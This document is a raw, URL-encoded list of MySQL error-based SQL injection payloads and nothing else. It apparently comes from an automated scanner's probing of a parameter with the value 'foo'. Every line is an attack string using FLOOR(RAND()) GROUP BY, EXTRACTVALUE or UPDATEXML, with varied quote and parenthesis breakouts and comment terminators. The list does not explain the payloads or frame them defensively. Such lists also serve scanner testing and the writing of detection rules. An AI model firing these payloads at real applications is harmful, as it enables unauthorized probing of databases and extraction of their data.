foo%27%29%29%29%20AND%20%28SELECT%206197%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%286197%3D6197%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%27LBkk%27%3D%27LBkk foo%27%20AND%20%28SELECT%206197%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%286197%3D6197%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27rFkI%27%3D%27rFkI foo%27%29%20AND%20%28SELECT%206197%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%286197%3D6197%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27ugoJ%27%20LIKE%20%27ugoJ foo%27%29%29%20AND%20%28SELECT%206197%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%286197%3D6197%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%27QtEl%27%20LIKE%20%27QtEl foo%27%29%29%29%20AND%20%28SELECT%206197%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%286197%3D6197%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%27IdcD%27%20LIKE%20%27IdcD foo%27%20AND%20%28SELECT%206197%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%286197%3D6197%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27YWaa%27%20LIKE%20%27YWaa foo%22%29%20AND%20%28SELECT%206197%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%286197%3D6197%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%22wteK%22%3D%22wteK foo%22%29%29%20AND%20%28SELECT%206197%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%286197%3D6197%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%22eoBu%22%3D%22eoBu foo%22%29%29%29%20AND%20%28SELECT%206197%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%286197%3D6197%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%22nzBo%22%3D%22nzBo foo%22%20AND%20%28SELECT%206197%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%286197%3D6197%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%22GCOg%22%3D%22GCOg foo%22%29%20AND%20%28SELECT%206197%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%286197%3D6197%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%22swWN%22%20LIKE%20%22swWN foo%22%29%29%20AND%20%28SELECT%206197%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%286197%3D6197%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%22QHan%22%20LIKE%20%22QHan foo%22%29%29%29%20AND%20%28SELECT%206197%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%286197%3D6197%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%22HNId%22%20LIKE%20%22HNId foo%22%20AND%20%28SELECT%206197%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%286197%3D6197%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%22zFtw%22%20LIKE%20%22zFtw foo%25%27%29%20AND%20%28SELECT%206197%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%286197%3D6197%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27%25%27%3D%27 foo%25%27%29%29%20AND%20%28SELECT%206197%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%286197%3D6197%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%27%25%27%3D%27 foo%25%27%29%29%29%20AND%20%28SELECT%206197%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%286197%3D6197%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%27%25%27%3D%27 foo%25%27%20AND%20%28SELECT%206197%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%286197%3D6197%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27%25%27%3D%27 foo%00%27%29%20AND%20%28SELECT%206197%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%286197%3D6197%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27oVes%27%3D%27oVes foo%00%27%20AND%20%28SELECT%206197%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%286197%3D6197%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27fDBK%27%3D%27fDBK foo%27%29%20WHERE%205979%3D5979%20AND%20%28SELECT%206197%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%286197%3D6197%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20--%20 foo%22%29%20WHERE%203235%3D3235%20AND%20%28SELECT%206197%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%286197%3D6197%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20--%20 foo%29%20WHERE%204823%3D4823%20AND%20%28SELECT%206197%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%286197%3D6197%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20--%20 foo%27%20WHERE%201516%3D1516%20AND%20%28SELECT%206197%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%286197%3D6197%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20--%20 foo%22%20WHERE%202106%3D2106%20AND%20%28SELECT%206197%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%286197%3D6197%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20--%20 foo%20WHERE%202422%3D2422%20AND%20%28SELECT%206197%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%286197%3D6197%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20--%20 foo%27%7C%7C%28SELECT%20%27yyIS%27%20FROM%20DUAL%20WHERE%204041%3D4041%20AND%20%28SELECT%206197%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%286197%3D6197%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20%29%7C%7C%27 foo%27%7C%7C%28SELECT%20%27JsBs%27%20WHERE%205011%3D5011%20AND%20%28SELECT%206197%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%286197%3D6197%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20%29%7C%7C%27 foo%27%2B%28SELECT%20AMhw%20WHERE%206042%3D6042%20AND%20%28SELECT%206197%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%286197%3D6197%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20%29%2B%27 foo%27%2B%28SELECT%20%27cbhr%27%20WHERE%209945%3D9945%20AND%20%28SELECT%206197%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%286197%3D6197%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20%29%2B%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%20%28SELECT%206197%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%286197%3D6197%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20%23 foo%29%20AND%20EXTRACTVALUE%282866%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282866%3D2866%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29 foo%27%29%20AND%20EXTRACTVALUE%282866%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282866%3D2866%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29 foo%27%20AND%20EXTRACTVALUE%282866%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282866%3D2866%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29 foo%22%20AND%20EXTRACTVALUE%282866%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282866%3D2866%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29 foo%29%20AND%20EXTRACTVALUE%282866%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282866%3D2866%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%287566%3D7566 foo%29%29%20AND%20EXTRACTVALUE%282866%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282866%3D2866%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%28%286789%3D6789 foo%29%29%29%20AND%20EXTRACTVALUE%282866%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282866%3D2866%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%28%28%288567%3D8567 foo%20AND%20EXTRACTVALUE%282866%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282866%3D2866%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29 foo%27%29%20AND%20EXTRACTVALUE%282866%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282866%3D2866%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%28%27dNvk%27%3D%27dNvk foo%27%29%29%20AND%20EXTRACTVALUE%282866%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282866%3D2866%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%28%28%27czec%27%3D%27czec foo%27%29%29%29%20AND%20EXTRACTVALUE%282866%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282866%3D2866%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%28%28%28%27DFDD%27%3D%27DFDD foo%27%20AND%20EXTRACTVALUE%282866%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282866%3D2866%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%27GXWN%27%3D%27GXWN foo%27%29%20AND%20EXTRACTVALUE%282866%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282866%3D2866%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%28%27lzNK%27%20LIKE%20%27lzNK foo%27%29%29%20AND%20EXTRACTVALUE%282866%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282866%3D2866%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%28%28%27lmTs%27%20LIKE%20%27lmTs foo%27%29%29%29%20AND%20EXTRACTVALUE%282866%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282866%3D2866%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%28%28%28%27giyw%27%20LIKE%20%27giyw foo%27%20AND%20EXTRACTVALUE%282866%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282866%3D2866%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%27ynHy%27%20LIKE%20%27ynHy foo%22%29%20AND%20EXTRACTVALUE%282866%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282866%3D2866%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%28%22lBOE%22%3D%22lBOE foo%22%29%29%20AND%20EXTRACTVALUE%282866%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282866%3D2866%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%28%28%22jZFW%22%3D%22jZFW foo%22%29%29%29%20AND%20EXTRACTVALUE%282866%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282866%3D2866%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%28%28%28%22BiHM%22%3D%22BiHM foo%22%20AND%20EXTRACTVALUE%282866%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282866%3D2866%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%22xYOH%22%3D%22xYOH foo%22%29%20AND%20EXTRACTVALUE%282866%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282866%3D2866%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%28%22EJsT%22%20LIKE%20%22EJsT foo%22%29%29%20AND%20EXTRACTVALUE%282866%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282866%3D2866%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%28%28%22Ygvt%22%20LIKE%20%22Ygvt foo%22%29%29%29%20AND%20EXTRACTVALUE%282866%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282866%3D2866%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%28%28%28%22DwXu%22%20LIKE%20%22DwXu foo%22%20AND%20EXTRACTVALUE%282866%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282866%3D2866%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%22aaPX%22%20LIKE%20%22aaPX foo%25%27%29%20AND%20EXTRACTVALUE%282866%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282866%3D2866%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%28%27%25%27%3D%27 foo%25%27%29%29%20AND%20EXTRACTVALUE%282866%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282866%3D2866%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%28%28%27%25%27%3D%27 foo%25%27%29%29%29%20AND%20EXTRACTVALUE%282866%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282866%3D2866%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%28%28%28%27%25%27%3D%27 foo%25%27%20AND%20EXTRACTVALUE%282866%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282866%3D2866%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%27%25%27%3D%27 foo%00%27%29%20AND%20EXTRACTVALUE%282866%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282866%3D2866%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%28%27qRXw%27%3D%27qRXw foo%00%27%20AND%20EXTRACTVALUE%282866%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282866%3D2866%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%27gTVZ%27%3D%27gTVZ foo%27%29%20WHERE%205028%3D5028%20AND%20EXTRACTVALUE%282866%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282866%3D2866%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20--%20 foo%22%29%20WHERE%204796%3D4796%20AND%20EXTRACTVALUE%282866%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282866%3D2866%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20--%20 foo%29%20WHERE%202730%3D2730%20AND%20EXTRACTVALUE%282866%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282866%3D2866%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20--%20 foo%27%20WHERE%201813%3D1813%20AND%20EXTRACTVALUE%282866%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282866%3D2866%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20--%20 foo%22%20WHERE%201845%3D1845%20AND%20EXTRACTVALUE%282866%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282866%3D2866%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20--%20 foo%20WHERE%207963%3D7963%20AND%20EXTRACTVALUE%282866%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282866%3D2866%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20--%20 foo%27%7C%7C%28SELECT%20%27laGc%27%20FROM%20DUAL%20WHERE%206415%3D6415%20AND%20EXTRACTVALUE%282866%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282866%3D2866%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20%29%7C%7C%27 foo%27%7C%7C%28SELECT%20%27ktPF%27%20WHERE%206619%3D6619%20AND%20EXTRACTVALUE%282866%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282866%3D2866%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20%29%7C%7C%27 foo%27%2B%28SELECT%20MytN%20WHERE%209434%3D9434%20AND%20EXTRACTVALUE%282866%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282866%3D2866%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20%29%2B%27 foo%27%2B%28SELECT%20%27QBUx%27%20WHERE%209768%3D9768%20AND%20EXTRACTVALUE%282866%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282866%3D2866%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20%29%2B%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%20EXTRACTVALUE%282866%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282866%3D2866%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20%23 foo%29%20AND%20UPDATEXML%282424%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282424%3D2424%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C8254%29 foo%27%29%20AND%20UPDATEXML%282424%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282424%3D2424%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C8254%29 foo%27%20AND%20UPDATEXML%282424%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282424%3D2424%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C8254%29 foo%22%20AND%20UPDATEXML%282424%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282424%3D2424%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C8254%29 foo%29%20AND%20UPDATEXML%282424%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282424%3D2424%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C8254%29%20AND%20%283977%3D3977 foo%29%29%20AND%20UPDATEXML%282424%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282424%3D2424%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C8254%29%20AND%20%28%281364%3D1364 foo%29%29%29%20AND%20UPDATEXML%282424%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282424%3D2424%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C8254%29%20AND%20%28%28%284208%3D4208 foo%20AND%20UPDATEXML%282424%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282424%3D2424%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C8254%29 foo%27%29%20AND%20UPDATEXML%282424%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282424%3D2424%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C8254%29%20AND%20%28%27JUAM%27%3D%27JUAM foo%27%29%29%20AND%20UPDATEXML%282424%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282424%3D2424%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C8254%29%20AND%20%28%28%27GAWr%27%3D%27GAWr foo%27%29%29%29%20AND%20UPDATEXML%282424%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282424%3D2424%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C8254%29%20AND%20%28%28%28%27uXtN%27%3D%27uXtN foo%27%20AND%20UPDATEXML%282424%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282424%3D2424%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C8254%29%20AND%20%27rVBg%27%3D%27rVBg foo%27%29%20AND%20UPDATEXML%282424%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282424%3D2424%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C8254%29%20AND%20%28%27JnYd%27%20LIKE%20%27JnYd 